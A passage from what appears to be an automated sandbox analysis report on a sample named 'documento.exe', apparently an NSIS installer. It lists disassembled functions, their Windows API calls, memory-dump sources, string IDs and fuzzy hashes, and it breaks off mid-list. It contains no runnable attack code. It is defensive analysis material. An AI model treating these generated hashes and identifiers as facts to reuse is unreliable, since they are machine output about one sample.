                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 0d9b77ec04c6300f2d1780336694ac6641750b272a9ea37e1e8171e8723cd637
                                                • Instruction ID: 2606314667324be55f41e30219fef3bc9394611b5aff82d746d43452e3b9cc2b
                                                • Opcode Fuzzy Hash: 0d9b77ec04c6300f2d1780336694ac6641750b272a9ea37e1e8171e8723cd637
                                                • Instruction Fuzzy Hash: 9901FF71540208BBEF109F60DD0AFEE3BB9EB04305F008039FA16B51E1D7B9A955DB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401D38 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(?), ref: 00401D3B
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                • MulDiv.KERNEL32 ref: 00401D57
                                                • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID: Times New Roman
                                                • API String ID: 3808545654-927190056
                                                • Opcode ID: 405e53858b96f349ff943583813b342f0df48d702d6f0c4f2847402c23a08874
                                                • Instruction ID: 9e7a7182ae9254896fc63aeedc32ca6a3ce3e3ef4d7c41cc1e10fd7b3e73fcff
                                                • Opcode Fuzzy Hash: 405e53858b96f349ff943583813b342f0df48d702d6f0c4f2847402c23a08874
                                                • Instruction Fuzzy Hash: 59016232944340AFE7016B70AE5EBA93FA89795305F10C475F201B62E2C57801569F7F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                • GlobalFree.KERNEL32(?), ref: 0040276F
                                                • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                • CloseHandle.KERNEL32(?), ref: 0040279A
                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: d27e6dee6e6f4e82c87f401b93c2f0eecd5ac49d2b8bb9bf004f164279e6a16c
                                                • Instruction ID: c72a82ba9ad54cd79da2f6af8e35d97bfd0db4c8549b0f23667d21b619a0d1b1
                                                • Opcode Fuzzy Hash: d27e6dee6e6f4e82c87f401b93c2f0eecd5ac49d2b8bb9bf004f164279e6a16c
                                                • Instruction Fuzzy Hash: 9E215C71C01124BBCF216FA5DE89EAEBA79EF05324F10423AF910762E1C7794D418FA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004046D7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(Fortrstningsfuldere7 Setup: Completed,Fortrstningsfuldere7 Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                • wsprintfA.USER32 ref: 0040477D
                                                • SetDlgItemTextA.USER32(?,Fortrstningsfuldere7 Setup: Completed), ref: 00404790
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s$Fortrstningsfuldere7 Setup: Completed
                                                • API String ID: 3540041739-932649381
                                                • Opcode ID: 2d636fce24791288b272f48c44559ee7df443eeeabb6113edb092f8abbd0bf81
                                                • Instruction ID: fde7fbcda73e06f71546803af61accc205d2577e4f834e35a140aa318663f7c1
                                                • Opcode Fuzzy Hash: 2d636fce24791288b272f48c44559ee7df443eeeabb6113edb092f8abbd0bf81
                                                • Instruction Fuzzy Hash: 3411E773A0412877DB10666D9C45EAF3288DB86374F254237FA26F31D1EA788C1281F8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403942 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowTextA.USER32(00000000,00422F20), ref: 004039DA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID: "C:\Users\user\Desktop\documento.exe"$1033$Fortrstningsfuldere7 Setup: Completed$.1
                                                • API String ID: 530164218-3584388413
                                                • Opcode ID: cac771c12f9d26aaba27c7f97aced8e21b7c01c0de3e01bb5d1af4f0863655d6
                                                • Instruction ID: 76705a7a5afea2c6a0eacb6801383c1eecc8e18f8899786da29e176716c049bd
                                                • Opcode Fuzzy Hash: cac771c12f9d26aaba27c7f97aced8e21b7c01c0de3e01bb5d1af4f0863655d6
                                                • Instruction Fuzzy Hash: 5211F6F1B04611ABCB209F15DD80A737B6CEBC5716328823FE90167394C67D9E029AAC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: b808d0bb620466522610f6ac799511a3b2708a3cf453d6ff390c0abf2acba867
                                                • Instruction ID: 77b923b5c768d409b2d5e956d577938eeee851e691c4f647a4d397fc18f4a02c
                                                • Opcode Fuzzy Hash: b808d0bb620466522610f6ac799511a3b2708a3cf453d6ff390c0abf2acba867
                                                • Instruction Fuzzy Hash: 10113D71A00108BEDF229F90DE89DAE3B7DEB54349B504436FA01F10A0D775AE51DB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: ae192c24391dac1c5176a4d9133dd9bdc5872c7a76e99082ce952db885f6304b
                                                • Instruction ID: 593f524f0f56d60e1fc11a8a6bbc9e15f3312f291ea64c997066006724e53d58
                                                • Opcode Fuzzy Hash: ae192c24391dac1c5176a4d9133dd9bdc5872c7a76e99082ce952db885f6304b
                                                • Instruction Fuzzy Hash: FEF03CB2A04114AFEB01ABE4DE88CAF77BCEB54301B004476F601F6190C7749D018B79
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040585D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00405CFD: lstrcpynA.KERNEL32(?,?,00000400,0040318B,00422F20,NSIS Error), ref: 00405D0A
                                                  • Part of subcall function 00405808: CharNextA.USER32(?), ref: 00405816
                                                  • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040581B
                                                  • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040582F
                                                • lstrlenA.KERNEL32(00421128,00000000,00421128,00421128,T'qu,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B0
                                                • GetFileAttributesA.KERNEL32(00421128,00421128,00421128,00421128,00421128,00421128,00000000,00421128,00421128,T'qu,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,75712754,C:\Users\user\AppData\Local\Temp\), ref: 004058C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\$T'qu
                                                • API String ID: 3248276644-3553432588
                                                • Opcode ID: cb887608a337bef365f075dbf4ed65c84e1b2a1d2ee6f30722e64456f73e84bd
                                                • Instruction ID: 909c8d3fd404249b72f59da3ca6e13a8b26d043f1499ff833ea169d8e7c403dc
                                                • Opcode Fuzzy Hash: cb887608a337bef365f075dbf4ed65c84e1b2a1d2ee6f30722e64456f73e84bd
                                                • Instruction Fuzzy Hash: FCF02823104D6121D63632361C05EAF1A84CD87364B28813BFC51B12D1CA3CC863DD7E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040576F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030C6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 00405775
                                                • CharPrevA.USER32(?,00000000), ref: 0040577E
                                                • lstrcatA.KERNEL32(?,00409014), ref: 0040578F
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040576F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-4017390910
                                                • Opcode ID: b93cf1ceae9b045ecd4922b716e1fc9cbd1c977ad46d60c8ebcd99b8bca78654
                                                • Instruction ID: 023f7408ada8d5c1aeddc6a893877c5a2de12b35a8757b47b9c38e9f0213d55a
                                                • Opcode Fuzzy Hash: b93cf1ceae9b045ecd4922b716e1fc9cbd1c977ad46d60c8ebcd99b8bca78654
                                                • Instruction Fuzzy Hash: BCD0A972605A30BAE21237169C09E8B2A0CCF82308B148023F200B72A2C63C4D028BFE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                  • Part of subcall function 00404F16: lstrlenA.KERNEL32(rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                  • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                  • Part of subcall function 00404F16: lstrcatA.KERNEL32(rghtten,00402FCF,00402FCF,rghtten,00000000,0040E8D8,00000000), ref: 00404F72
                                                  • Part of subcall function 00404F16: SetWindowTextA.USER32(rghtten,rghtten), ref: 00404F84
                                                  • Part of subcall function 00404F16: SendMessageA.USER32 ref: 00404FAA
                                                  • Part of subcall function 00404F16: SendMessageA.USER32 ref: 00404FC4
                                                  • Part of subcall function 00404F16: SendMessageA.USER32 ref: 00404FD2
                                                • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FDB
                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 00402045
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2987980305-0
                                                • Opcode ID: 3b081aef81ff629f146bbe59bed4ce20841918d67cbec0e6b9b54e24ec9e4470
                                                • Instruction ID: b68841798668a23a4ff443840be3121a405d120f2a8fc72f381fb15ba3c401f2
                                                • Opcode Fuzzy Hash: 3b081aef81ff629f146bbe59bed4ce20841918d67cbec0e6b9b54e24ec9e4470
                                                • Instruction Fuzzy Hash: 72212E72904215FBDF217F648E4DA6E7670AB45318F30423BF301B52D0D7BD49419A6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32 ref: 00402C15
                                                • GetTickCount.KERNEL32(00000000,00402DE2,00000001), ref: 00402C33
                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: bf3565a8d54977e971102c74698aaa5ab0c905542a3b89f7c95156eeb2b10c0e
                                                • Instruction ID: 2730d2a3776e1339b9346d87ab19af6b7380862a528adabe40aaf425641bd1fc
                                                • Opcode Fuzzy Hash: bf3565a8d54977e971102c74698aaa5ab0c905542a3b89f7c95156eeb2b10c0e
                                                • Instruction Fuzzy Hash: 68F054B090A270ABD621BF20FE4C99F7B74E7447117124476F004B21A4C67898C1CBAC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404E8A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00404EB9
                                                • CallWindowProcA.USER32(?,?,?,?), ref: 00404F0A
                                                  • Part of subcall function 00403F2E: SendMessageA.USER32 ref: 00403F40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 44b8d16fffa3cf511a27652146f874074467920310ea138c5a7b32cc615b7cdd
                                                • Instruction ID: 4911906597f3eaa4ffbe68f0188cda158002c4f31c253b535ba85266db60279e
                                                • Opcode Fuzzy Hash: 44b8d16fffa3cf511a27652146f874074467920310ea138c5a7b32cc615b7cdd
                                                • Instruction Fuzzy Hash: DC0175B110020DABDB205F52EC81AAB3625F7C4751F204037FB01756D1C7399C51AAB9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004035E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(?,75712754,00000000,C:\Users\user\AppData\Local\Temp\,004035C0,004033DA,?), ref: 00403602
                                                • GlobalFree.KERNEL32(00000000), ref: 00403609
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004035E8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
